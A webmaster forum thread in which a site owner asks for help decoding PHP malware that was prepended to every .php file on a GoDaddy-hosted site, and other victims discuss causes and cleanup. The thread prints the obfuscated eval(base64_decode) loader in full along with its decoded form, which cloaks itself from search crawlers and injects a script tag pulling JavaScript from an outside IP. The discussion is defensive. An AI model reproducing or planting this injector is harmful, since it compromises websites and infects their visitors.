One of my sites was hacked. I'm looking for help to find out the reason.

Greetings.

It seems a hacker got access to my server or ftp account and he ran a script that put a piece of ENCODE PHP code at the beginning of all .php files in my server. I'm looking for help to interpret this code DECODED.

The ENCODED PHP code is this one:

<?php /**/ eval(base64_decode("z	siSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk4Mk1TNDBMamd5TGpJeE1pOXFjeTV3YUhBaVBqd3ZjMk55YVhCMFBnPT0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>

PHP:

This code DECODED is this PHP script:

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;   if(!function_exists('mrobh')){      if(!function_exists('gml')){     function gml(){      if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){       return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly82MS40LjgyLjIxMi9qcy5waHAiPjwvc2NyaXB0Pg==");      }      return "";     }    }        if(!function_exists('gzdecode')){     function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){      $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));      $RBE4C4D037E939226F65812885A53DAD9=10;      $RA3D52E52A48936CDE0F5356BB08652F2=0;      if($R30B2AB8DC1496D06B230A71D8962AF5D&4){       $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));       $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];       $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&8){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&16){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&2){       $RBE4C4D037E939226F65812885A53DAD9+=2;      }      $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));      if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){       $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;      }      return $R034AE2AB94F99CC81B389A1822DA3353;     }    }    function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){     Header('Content-Encoding: none');     $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);       if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){      return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);     }else{      return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();     }    }    ob_start('mrobh');   }  }

PHP:

Someone expert in PHP and Security could please help me to find out what this script do? What's the target of this PHP code DECODED?

Thanks a lot for any help!!!

 

Really thanks for your help DigitalPoint.

I already deleted this piece of code from all my .php files. It just was activated like 2 hours yesterday. I redirected my site with 505 error and stopped searchers crawling with robots.txt while I deleted the code in all .php files.

So, I shouldn't be worry too much about the impact it could had?

Do you think the person who did this misdemeanor had access directly to my FTP account or probably it was caused by a Folder Permissions vulnerability?

Thanks newly!

By the way, that URL shows my a 404 Not Found.

http://www1.fastfullfind22p.xorg.pl?p=p52dcWpkbG6HjsbIo21wiXNe0KCfYWCdU9LXoKith6Swz9KwoFqbnZxxmpi2m8%2FUoKebWqas0GrEYWiaj5qUlZZoYlzY1cStp6d2ZV6ldV%2FVltjSlm1TmpukyWqIppnLpKCKzKF0aWuTlJVnZGZvYmplbF%2FTksqjV6SgcWNqm16bYmCZYJSK16Rpb2eXmJRyZGRsZ2lam5yegreMqJmRcWpxnA%3D%3D

Code (markup):

 

we had a couple of WP sites done with this same thing last night, all sites in that hosting package were done the same.

is your site on WP too? wondering whether its a plugin vulnerability or they dont care what type of site it was.

also who is yours hosted with? there are on godaddy.

 

One of the reasons this happened might be that you have a trojan/virus on your pc. That trojan might have stolen your ftp user/pass(this scenario happens a lot lately and it's as probable as a server side vulnerability). To be sure, change your credentials using a different (clean) computer!

 

possible of course but seems unlikely given the security on the PCs here, and the fact that it's only one hosting package (hopefully, stays that way ) out of many many that get accessed from here.

 

Good Day SEOIbiza. My site is a webpage. No frameworks.

 

I'm using GoDaddy, the weird thing is, this happened when I wasn't at home. I was one week without turn on the PC where I use to work.

 

Check server logs, ftp log, etc... that can help to find where is the problem.
Anyways first movement is clean all php files and change all passwords (ftp, wordpress admin, etc...).

Hope it helps.

 

It has to be an issue with GoDaddy. I have been round and round. I have found Wordpress blogs, phpBB forums and Pligg installations with the infection. The only common denominator so far is GoDaddy. Is your IP 97.74.215.82 or anything close?
Mine got hit last week and then again this week.
More info:
http://community.godaddy.com/groups/go-daddy-customers/forum/topic/malware-infection/
http://www.quatloos.com/Q-Forum/viewtopic.php?f=20&p=92769
http://forums.pligg.com/questions-comments/21128-new-pligg-virus.html

 

Thanks everybody for all your help!!! Well.. this seems to be a GoDaddy problem I'm some agree. They are my hosting provider. I contacted them and this is their answer:

Naphets my ip isn't close to that one.. it is 68.178.2..

I noticed that this malware script leaved some files and permission folders with 777 mode.. making them vulnerable again.. I changed all folders to 754 and files to 654 and my ftp password for 14 digits with symbols,nums,cap. letters, etc.... I hope this helps to avoid this attach again.

If someone has more info about this or any contribution I will appreciate it! Thanks newly!

 

By the way, I read somewhere "do not leave your FTP password in your FTP program, for example FireFTP and others...".. I think It could help to avoid attacks!

 

Any software with any credibility would not store it as plain text.... but what does it matter;

a) if you had to type it in; keyloggers
b) FTP sends your details as plain text (username & password) anyway

 

I also discovered one of my sites infected with this. Site is wordpress running on godaddy shared hosting too.

I 'warded' it off for now by replacing the "</body>" with "<script>document.write("<"+"/"+"bo"+""+"dy"+">");</script>".

 

lol, i got the standard "fob off" letter too, "its nothing to do with us" type of thing.. wankers.

Im sure its a Godaddy issue too. because of the variety of different sites its not a WP plugin vulnerability and Godaddy are the only host affected.

 

Has anyone been able to fix this js on footer issue on WP? This seems to be a massive attack ...a Chinese hacking script for WP...but if you have other sites in the same server as you WP blog, it infects them too...

 

Just got infected today. I've a Drupal site hosted at GoDaddy and discovered the problem this morning. I checked my files, and found that all .php files had the "eval(base64_decode" line at the beginning.

I simply resent all the files by FTP and site went back to normal, although it does not solve the problem, as I still don't know how the files were changed and what kind of exploit was used.

 

Definitely a GoDaddy problem. My Drupal site is hosted at address 72.167.131.105 (p3slh172.shr.phx3.secureserver.net) and was hit this morning.

I reviewed the HTTP logs from 22 to 28/04 and there is no trace of any attack. But being on a shared hosting plan, I can't have access to the server logs.

 

It's a godaddy issue! I am glad I cancelled my hosting with em...The worst part is that they dont / wont do anything about it nor do they have a security team that deals with this type of issues unlike gator. I'd suggest SCAN you pc with panda internet security...probably the ONLY antivirus that'd be able to track that spyware in your system. Get the free evaluation version (if you dont want to spend on that purchse right away) and scan your pc to begin with and then change all your passwords// username from another secured pc. Then only you can worry about fixing the issue. It'd require a mass cleanup...and do take a look at the files that aint necessarily php...Something triggers that infection!

It's a WP hack script from China...but looks like it affects other cms too. I know some guys who can fix the issue in case you're lost!